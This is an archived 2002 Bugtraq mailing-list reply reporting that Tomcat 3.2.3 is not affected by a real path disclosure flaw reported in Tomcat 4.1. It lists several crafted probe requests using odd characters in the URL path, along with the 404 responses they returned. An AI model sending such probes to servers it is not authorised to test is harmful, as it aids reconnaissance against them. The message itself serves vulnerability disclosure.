[25184] in bugtraq
Re: Tomcat 4.1 real path disclosure
daemon@ATHENA.MIT.EDU (Joe Testa)
Fri Apr 19 20:12:17 2002
Message-ID: <3CC0675C.7020602@rapid7.com>
Date: Fri, 19 Apr 2002 14:52:12 -0400
From: Joe Testa <jtesta@rapid7.com>
MIME-Version: 1.0
To: Wang Yun <lovehacker@chinansl.com>, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
It appears as though Tomcat v3.2.3 is not vulnerable:
GET /+/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /+/index.jsp
Not found request: /+/index.jsp
GET />/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request:</b> />/index.jsp
Not found request:</b> />/index.jsp
GET /</index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /</index.jsp
Not found request: /</index.jsp
GET /%20/index.jsp HTTP/1.0
- -------------------------
Not Found (404)
Original request: /%20/index.jsp
Not found request: /%20/index.jsp
- Joe Testa
NeXpose: the only expert-system based network vulnerability
scanner with less than 1% false positives: http://www.rapid7.com/
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE8wGbHZbL130sRBrQRAkGMAJ9fDpuPNn+GiGHXg7Xkmrg61VVCDwCeO0z+
rgjmj5/3k580whGTDaY1/BI=
=Xg2V
-----END PGP SIGNATURE-----
